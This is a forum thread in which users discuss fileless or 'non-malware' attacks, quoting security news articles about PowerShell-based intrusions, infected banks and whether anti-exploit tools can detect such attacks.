Non-malware attacks

[sman]

https://zeltser.com/fileless-malware-beyond-buzzword/

Quote

In contrast, a reasonable alternative to the term fileless malware was introduced by Carbon Black in its 2016 Threat Report. The report used the phrase non-malware attacks. Writing on the company’s blog a few months later, Michael Viscuso explained the meaning of this term like this:

“A non-malware attack is one in which an attacker uses existing software, allowed applications and authorized protocols to carry out malicious activities. Non-malware attacks are capable of gaining control of computers without downloading any malicious files, hence the name. Non-malware attacks are also referred to as fileless, memory-based or ‘living-off-the-land’ attacks.”

Gartner used the term “non-malware attack” in a 2017 report that highlighted Carbon Black. However, another Gartner report published a month later used “fileless attacks” instead.

Why Does It Matter?

I like the idea of saying “non-malware attacks” for incidents that rely solely on legitimate system administration tools and other non-malicious software. This is the scenario that some people describe as living-off-the-land. In contrast, I might prefer to say “memory-only malware” if I need to point out that malicious code is never saved to disk, perhaps because it was injected into another process. I’m even OK with saying “fileless malware” when bringing focus on persistence mechanisms that avoid placing traditional executables on the file system.

Unfortunately, nowadays the terminology has been commingled, and we’re probably stuck with the term “fileless malware” to describe the various scenarios outlined above, despite the term’s ambiguity. Alas, human language is imprecise and always-evolving. (If we all spoke C#, perhaps the world would be a better place.)

I care about this terminology because I’m trying to avoid buzzwords and empty phrases when describing the capabilities of the anti-malware product for which I’m responsible at Minerva. It runs alongside other endpoint security tools and blocks all sorts of sneaky malware, regardless whether its payload touches disk. I’m often asked how we handle fileless malware; I decided to perform the research above to better understand how and when I should use this term.

https://www.minerva-labs.com/

 

[Aura]

That article generated a couple of tweets on my feed (mostly from Security Researchers that were for/against it).

[sman]

Is it another form of exploit??..

[Aura]

It can be seen as another form of exploit, yes, however these aren't new and have been around for a while. Any "malware" that uses legitimate Windows files such as PowerShell.exe, cmd.exe, etc. and "live in memory" can be seen as "non-malware attacks". I guess this is because malware means "malicious software", and "software" such as PowerShell aren't malicious, they are legitimate, but they can be used to infect a system.

[sman]

But it is said, they are difficult to detect, hence the very name causes un-easiness and push traditional AV detection to oblivion? 

[exile360]

They're only difficult to detect if the protection being used relies solely on analyzing binaries.  Protections that use behavioral detection/prevention capabilities shouldn't be fooled by these tactics.  I do not know about all of the possible vectors, but I know that at least a good portion of them would set off our exploit protection, thus thwarting the attack.  That said, for ones that strictly use a script file like a .bat or .vbs might not trigger our exploit protection, but tricking a user into manually running one of those isn't so easy these days, especially since, unlike with PE files, you can't change the icons of those filetypes to mislead the user.  I have seen some that will use an exploited document like a PDF or Word doc to download/run such a script, but that in itself would trigger exploit protection as would scripting through a web browser.

[sman]

here is a rather disturbing report http://www.darkreading.com/vulnerabilities---threats/fileless-malware-takes-2016-by-storm/d/d-id/1327796

 

Quote

Fileless malware is not a revolutionary approach, but 2016 certainly saw a dramatic rise in this type of attack as the criminals worked to perfect it. Areport out earlier this month from Carbon Black says that researchers have found that in the last quarter of 2016, there was a 33% rise in severe non-malware attacks compared to first quarter. The firm reported that over a 90-day period, about one-third of organizations are likely to encounter at least one severe fileless attack.

 

https://www.carbonblack.com/2017/02/10/non-malware-fileless-attack/

Quote

Non-Malware Attack Example

Non-malware attacks leverage a robust suite of tactics and techniques to penetrate systems and steal data without using malware at all. They have grown in prevalence in recent years as attackers have developed ways to launch these attacks at large scale.

Let’s take a look at an example attack:

1. A user visits a website using Firefox, perhaps driven there from a cleverly disguised spam message.
2. On this page, Flash is loaded. Flash  is a common attack vector due to its seemingly never-ending set of vulnerabilities.
3. Flash invokes PowerShell, an OS tool that exists on every Windows machine, and feeds it instructions through the command line — all operating in memory.
4. PowerShell connects to a stealth command and control server, where it downloads a malicious PowerShell script that finds sensitive data and sends it to the attacker This attack never downloads any malware.

Quote

Streaming Prevention: A New Approach to Endpoint Protection

Streaming prevention offers a fundamentally new approach to identifying and preventing cyberattacks. Current approaches used by legacy AV and machine-learning AV focus exclusively on files and do nothing to target an attacker’s behaviors.

In contrast to legacy AV and machine-learning AV, streaming prevention monitors the activity of applications and services, including communications between processes, inbound and outbound network traffic, unauthorized requests to run applications, and changes to credentials or permission levels.

Streaming prevention doesn’t just monitor individual events on an endpoint; it monitors and analyzes the relationships among events.

Sticking with the example above, browsing the web, running Flash and invoking PowerShell are each, in their own right, viable and necessary events, but what about when they appear as a cluster of events? It’s simply not normal behavior and, as such, can be tagged, flagged and automatically shut down by streaming prevention before the attacker can carry out objectives.

_________________________________________________

 

[Aura]

Once again, nothing new here. It's true that there's been more of these infection in the last 2 years or so (since 2015-2016), but decent Anti-Exploit programs (like Malwarebytes and Malwarebytes Anti-Exploit Beta) are able to detect and block these.

[sman]

Nice to know that the threats are in MB's radar.. But why all the noise?..

[Aura]

What do you mean by that?

[sman]

If existing tools can mitigate the risks, why so much outcry by the security experts (even Kaspersky, Symantec etc.) on this?.. why endpoint protection is said to be found wanting and the rise in infection of banks/financial crimes as per https://arstechnica.com/security/2017/02/a-rash-of-invisible-fileless-malware-is-infecting-banks-around-the-globe/

Quote

A rash of invisible, fileless malware is infecting banks around the globe

Once the province of nation-sponsored hackers, in-memory malware goes mainstream.

DAN GOODIN - 2/8/2017, 2:31 PM

Quote

Now, fileless malware is going mainstream, as financially motivated criminal hackers mimic their nation-sponsored counterparts. According to research Kaspersky Lab plans to publish Wednesday, networks belonging to at least 140 banks and other enterprises have been infected by malware that relies on the same in-memory design to remain nearly invisible. Because infections are so hard to spot, the actual number is likely much higher. Another trait that makes the infections hard to detect is the use of legitimate and widely used system administrative and security tools—including PowerShell, Metasploit, and Mimikatz—to inject the malware into computer memory.

https://threatpost.com/hard-target-fileless-malware/125054/

Quote

Fileless is The Future

Concerns have triggered numerous warnings from cybersecurity organizations including one in October from the Department of Homeland Security and one in March from the New Jersey Cybersecurity and Communications Integration Cell. The NJCCIC cautioned:

“The NJCCIC assesses with high confidence that fileless and ‘non-malware’ intrusion tactics pose high risk to organizations, both public and private, and will be increasingly employed by capable threat actors intent on stealing data or establishing persistence on networks to support ongoing espionage objectives or to enable future acts of sabotage.”

When it comes to attribution, a number of threat actors’ names are commonly associated with these types of attacks. Cybercriminal and nation-state operations such as Carbanak, Duqu and FIN7 have each been suspected in memory-based malware attacks.

Last month, researchers at Morphisec released a report stating FIN7 was behind several recent incidents. One was a high-profile attack that used fileless malware targeting professionals affiliated with United States Securities and Exchange Commission filings. Kaspersky Lab said attackers who targeted 140 banks and enterprises were likely connected to the GCMAN and Carbanak groups. But, Epstein said, a wide range of less organized and less sophisticated threat actors are now leveraging fileless malware attacks.

Mitigation against these threats will take new tools and a shift in end-user awareness, Brumaghin said. For starters, security experts say disabling the use of PowerShell on networks is a good start. They also recommend monitoring more closely outbound traffic and tracing it back to applications making those requests. If Windows Notepad or Calculator are making network connections, you might have a problem, experts say.

“From the malware author side, we are expecting to see more advanced attacks,” said Mordechai Guri, chief security officer at Morphisec. “We will see more advanced obfuscation, polymorphism and injection techniques, that evade such a potential monitoring and detection.”

 

[sman]

It is all the more shocking & disturbing to know that many Banks (which would not be slack in it's security/protection) are hit.. 

[gonzo]

I have seen many bank ATMs that (when they crash) show that they run XP.  Banks are often slack in their protection, because their upgrades are tens of thousands of computers.  That's not an insignificant amount of resources required.

[sman]

But protection compromise would only be invitation for more trouble, as businesses bound to suffer what with client compensation that could cripple them and here in this threat scenario, it's not about ATM's but about Banking setup's being hit..(which is the disturbing fact)..

Edited May 19, 2017 by sman

[Aura]

Quote

why so much outcry by the security experts (even Kaspersky, Symantec etc.) on this?.. why endpoint protection is said to be found wanting and the rise in infection of banks/financial crimes

It's the same thing with Ransomware. Ransomware were already a thing before CryptoLocker, but it took a massive campaign for the world to notice that "new" threat.

[sman]

Certainly 'Central Banks' all around would have a Cyber protection policy which member Banks ought to comply with and whether the Bank's hit are due to non-compliance of Central Bank policies?..

[exile360]

Unfortunately many Point Of Sale (POS) systems, bank ATMs and other machines used for financial transactions are still outdated.  I see them all the time still running XP as mentioned above and I still see a few every once in a while still running Windows 2000.

As for why all the noise, look at the majority of major AVs.  The last time I checked, most don't have robust exploit detection/prevention technology.  That's why you still see so many articles about exploits recommending MBAE/Malwarebytes 3 as well as EMET and HitmanPro.Alert because the exploit protection provided by most AVs just isn't cutting it.  They still seem more concerned with detecting binaries and doing well on synthetic tests, which seldom ever test against live/in the wild exploits.

[sman]

But if it's to do with sticking to XP, why the reports/articles referred hav'nt said so??.. 

Quote

Using Good Tools for Bad Purposes

Attackers can also get more aggressive and turn to other forensic and penetration-testing tools such as Metasploit or Mimikatz, that allow you to either inject code into system memory or read data stored in memory. These open-source tools, along with others such as Lazagne, and Meterpreter, allow attackers to probe deeper into targeted systems, steal credentials and open reverse shells back to the adversary’s control server.

Would like to see the blocking of these exploit kits, to see the effectiveness.. It is not that exploit tools are not embraced by AV's.. Norton , Eset etc. come with exploit protection too (which caused compatibility issues during MBAE testing phase).. 

[sman]

As I pointed that it's not abt. XP being targeted but even other versions as in http://www.removemalwarevirus.com/learn-easy-solution-to-remove-fileless-malware-quickly

 

Quote

nformation About Fileless Malware

Fileless Malware is basically a stubborn Trojan infection that has been reported more enhanced and improved as compared to it's predecessors. Now as from the threat name it simply reflects that this infection do not makes usage of any types of files in carrying out the infection procedure. Being compatible with almost all the versions of Windows OS i.e., Windows XP/Vista/7/8/19, this infection makes it's existence only in the memory instead of that of the compromised system's hard drive. It is scripted directly into the RAM. Moreover this code is invaded into several executing processes including iexplore.exe or javaw.exe, which is further then utilized for the exploit.

So, when Banks are targeted and hit, it is a serious concern on not only abt. Banking dealings but abt vulnerability of systems in general to such attacks ..